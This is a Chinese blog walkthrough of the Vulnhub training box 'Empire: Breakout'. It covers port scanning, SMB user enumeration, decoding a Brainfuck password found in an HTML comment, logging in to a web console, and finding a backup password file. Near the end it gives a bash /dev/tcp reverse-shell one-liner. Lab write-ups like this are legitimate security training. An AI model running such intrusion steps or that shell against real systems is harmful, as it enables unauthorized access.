[Vulnhub]Empire: Breakout

文章描述了一次针对IP192.168.252.140的网络渗透测试过程。通过端口扫描发现80、10000、20000等端口开放,10000和20000分别为用户和管理员登录。利用enum4linux枚举SMB服务获取到cyber账号。解密HTML中的密码并成功以cyber身份登录20000端口。找到ELF文件并使用它打开隐藏的旧密码文件,推测是root密码。最终通过反弹shell尝试权限提升。
摘要由CSDN通过智能技术生成
This box was created to be an Easy box, but it can be Medium if you get lost.

本地地址192.168.252.140

信息搜集

80端口是一个apache的默认页,没什么东西,先扫描端口:

网页端开了80、10000、20000三个端口,进后两个端口需要https,10000是用户登录,20000是管理员登录。同时还开启了139端口和445端口,这两个端口都是危险端口,可能存在利用空间。

攻击流程

使用kali中的enum4linux对smp服务进行枚举攻击:

爆破出来一个账号cyber。

返回80端口,在其中的html里,我们发现了一段注释:

don't worry no one will get here, it's safe to share with you my access. Its encrypted :)

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.

一眼brainfuck,解出来结果为.2uqPEfj3D<P'a-3

尝试以cyber为用户名,解密结果为密码进行登录,在20000端口登陆成功。登录成功后,发现web页面居然有虚拟终端可以用,我们在cyber的默认目录下得到flag1:

权限提升

同时我们发现同目录下还有一个叫做tar的ELF文件,权限为0755,这个命令猜测应该可以打开什么文件,然后就是全盘搜索时间,通过find / -name "*pass*",在/var/backups中发现一个叫old_pass.bak的隐藏文件,应该就是要这个了。

具体操作如下:

其中./tar是我们看到的那个文件,tar是bash命令。

猜测这个应该就是root的密码了,但是这个虚拟终端不能直接提权,因此我们得反弹shell:

bash -i >& /dev/tcp/localhost/2333 0>&1

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值